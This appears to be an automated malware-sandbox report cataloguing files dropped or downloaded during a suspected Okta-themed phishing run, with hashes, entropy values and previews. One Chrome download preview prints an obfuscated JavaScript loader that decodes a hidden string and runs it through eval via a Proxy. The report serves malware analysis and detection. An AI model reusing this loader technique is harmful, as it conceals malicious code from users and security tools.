                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:677869E67E0770B211CF4B2EBFADC067
                                                    SHA1:73632C3CA2F7882B6F723EE39EECB40A33D4DAFC
                                                    SHA-256:0C4E275CF56A3D34EBEA052C762EC527BD27587F64D6B3093CC7B4ADA22B6AC9
                                                    SHA-512:2BFC2C366CAF6597D46B8646FCE419BECCBC03367A1A99302758527383CA5873055778A1C6B2C88A653B718059420FD711B652DA84EEB91EE5E1E7C769167F42
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:............................................................................`...P...0.....]....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................0.7X9.............]............v.2._.O.U.T.L.O.O.K.:.1.3.0.:.f.1.4.a.5.b.b.4.3.9.2.7.4.2.0.5.8.a.8.a.f.0.5.4.6.a.4.c.6.5.3.a...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.4.0.1.T.0.9.1.7.0.6.0.4.2.3.-.3.0.4...e.t.l.......P.P.P...0....T.]............................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (393)
                                                    Category:dropped
                                                    Size (bytes):16525
                                                    Entropy (8bit):5.359827924713262
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
                                                    SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
                                                    SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
                                                    SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with very long lines (392), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15090
                                                    Entropy (8bit):5.359155805555009
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:220203B648B1E48489328282C6935386
                                                    SHA1:1143403DEEB9878ADBBC63FC7E20BB2AC8EB2B6D
                                                    SHA-256:84775F7B36883D7A36D0C4F81F4935BD29EDD9735E66DD1559DEDBD8A7A51B20
                                                    SHA-512:506E67D0290CCBBB8A7CACD9C2B9801EB8B9E08E9F832FE729E908DA986DF372573E57326999A0159B9184AEED9C488CB051E1BD9FFA1F0C6FBCFE2F3CAD24CF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:SessionID=b741803c-b703-40ad-b113-f72b1c8d59c7.1743513495777 Timestamp=2025-04-01T09:18:15:777-0400 ThreadID=6212 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b741803c-b703-40ad-b113-f72b1c8d59c7.1743513495777 Timestamp=2025-04-01T09:18:15:779-0400 ThreadID=6212 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b741803c-b703-40ad-b113-f72b1c8d59c7.1743513495777 Timestamp=2025-04-01T09:18:15:779-0400 ThreadID=6212 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b741803c-b703-40ad-b113-f72b1c8d59c7.1743513495777 Timestamp=2025-04-01T09:18:15:779-0400 ThreadID=6212 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b741803c-b703-40ad-b113-f72b1c8d59c7.1743513495777 Timestamp=2025-04-01T09:18:15:779-0400 ThreadID=6212 Component=ngl-lib_NglAppLib Description="SetConf
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):35721
                                                    Entropy (8bit):5.4237431281441495
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8B7F7A3AF156E33E68FA1C6258D29B82
                                                    SHA1:DA41BA9CA6AF02B2526660271D5BF67CE121FC3A
                                                    SHA-256:E68B825B3C2B19239B80BD7815D18E67EFBE97B60786FD179409DF3F463CF361
                                                    SHA-512:551A4BCFE76FB1F58F4E72CCC697FF76A00CEF608E1C10FF9E66583F23F2218CD6CBFC6CE621FB840ABD2A2D116E95A3257E673A47201FB698E41D92049953C3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                    Category:dropped
                                                    Size (bytes):1419751
                                                    Entropy (8bit):7.976496077007677
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F6CACB4A8F3328CA8C06812420C0337E
                                                    SHA1:184589C5954FE73E4DF5569A0D0E2F85189917DF
                                                    SHA-256:91E9A938AF33129F4DD910E38980BEAC9C64982E76458D75B92CB03B0FBCDFD6
                                                    SHA-512:78D790967B665A9EC54C92ECB89336A67D8ED7B385B25AC465A28F31BF88D7DFC1A2FAE4791BEE33E48CE5EF783C1C9169D1C905E9CFCA090FF54C71335FA0A0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                    Category:dropped
                                                    Size (bytes):1407294
                                                    Entropy (8bit):7.97605879016224
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                    SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                    SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                    SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                    Category:dropped
                                                    Size (bytes):758601
                                                    Entropy (8bit):7.98639316555857
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:732C4E8507E4D875CFE981D71D21E2DD
                                                    SHA1:E7D7F6AD262BD324742DC268F3A5B500AB2EA283
                                                    SHA-256:7D24D933CAD1A56D78F9CA6AB4F0CE2481BE9AFA663B64EE177BF6E2E1B18715
                                                    SHA-512:C51FCF5C69D56F6555CFFE1D13946B379D06E5C6DA721A5764DAD63E6215C9C3B868CC20D328A1C1B691661AFC27509C0D6C90F36F05885EBC1C48F648E509E8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                    Category:dropped
                                                    Size (bytes):386528
                                                    Entropy (8bit):7.9736851559892425
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):163840
                                                    Entropy (8bit):0.4159515097127236
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C2BAE48B95C3D8D2ABADDEEDF989CFCC
                                                    SHA1:5ED9B380678D2737466C24255CCA4BEA9FFB3E66
                                                    SHA-256:BB0752331C3C197B2697F1629059030CA545A931FE692D1C445B3E52EC7E397C
                                                    SHA-512:1D8A80AAFD8F500226F01A90C64868BC0FE2413C00CE9FA95929CAB4139670D2F07E09C1BBDFCAA112DDFFF877D2A2BBE4F044EB48B02910636457A06EC1E438
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:Microsoft Outlook email folder (>=2003)
                                                    Category:dropped
                                                    Size (bytes):271360
                                                    Entropy (8bit):1.4753188572386169
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:455DC4236FF3EF40D65D9056657C52DC
                                                    SHA1:D4F1E2172129E60A57E48B3093BCCC0AF816BD2A
                                                    SHA-256:5F34039C00B92B85D9B7704D930CA25258C60188551211C723A9AAFDAFEDB389
                                                    SHA-512:3537EE21DFA645311D8EC642BE8001B7ECBE11936DCBDDE99B0E04A5392886900B6510AE636FCE29785B0208989C5974F283D81CDC82A1A9020AC16B9454456B
                                                    Malicious:true
                                                    Reputation:unknown
                                                    Preview:!BDN9...SM......\......................[................@...........@...@...................................@...........................................................................$.......D.......;..........................................................................................................................................................................................................................................................................................................................@........?.@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.9753355862959311
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2B3BF48DDA9655688BDCE43045BFADF3
                                                    SHA1:97D5E4E2339664E51D152EA1CABBE333F7694B10
                                                    SHA-256:4D7C2A20D70A2CEC5A8EEE5D805C47F1C8CB25800A9D036876A73A78C6C2CBFE
                                                    SHA-512:0FFC1F549176959AC648EBBA7FEBC41FBFE08A46CBDEEEED8722AD6B243A5ACE3DDDCC2ECFFCBF7FDFB49653407BE68251C5515A1638672EE219503687FB2161
                                                    Malicious:true
                                                    Reputation:unknown
                                                    Preview:.3..C...H.......0....i]......................#.!BDN9...SM......\......................[................@...........@...@...................................@...........................................................................$.......D.......;..........................................................................................................................................................................................................................................................................................................................@........?.@.....i].........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):2905
                                                    Entropy (8bit):3.962263100945339
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FE87496CC7A44412F7893A72099C120A
                                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/wxG0JrQPMlHU0nNYZc69rsYdteMSIMkC06HWwfr9Z1qASaab180
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):4724541
                                                    Entropy (8bit):2.5839796656457863
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                    SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                    SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                    SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/56naWlpDT6aZ2fnGq6UY5UVbghg6djvvXoCdzxf89109
                                                    Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):7390
                                                    Entropy (8bit):4.02755241095864
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://0cp.zlgbgfnebrnn.com/klIGmhIzloSDNVZQ0fJEec8W4AE3cdKofOLl4zYRuZoxcL7s56170
                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:dropped
                                                    Size (bytes):17842
                                                    Entropy (8bit):7.821645806304586
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4B52ECDC33382C9DCA874F551990E704
                                                    SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                    SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                    SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10450)
                                                    Category:downloaded
                                                    Size (bytes):10498
                                                    Entropy (8bit):5.327380141461276
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E0D37A504604EF874BAD26435D62011F
                                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:RIFF (little-endian) data, Web/P image
                                                    Category:dropped
                                                    Size (bytes):25216
                                                    Entropy (8bit):7.947339442168474
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F9A795E2270664A7A169C73B6D84A575
                                                    SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                    SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                    SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1864
                                                    Entropy (8bit):5.222032823730197
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
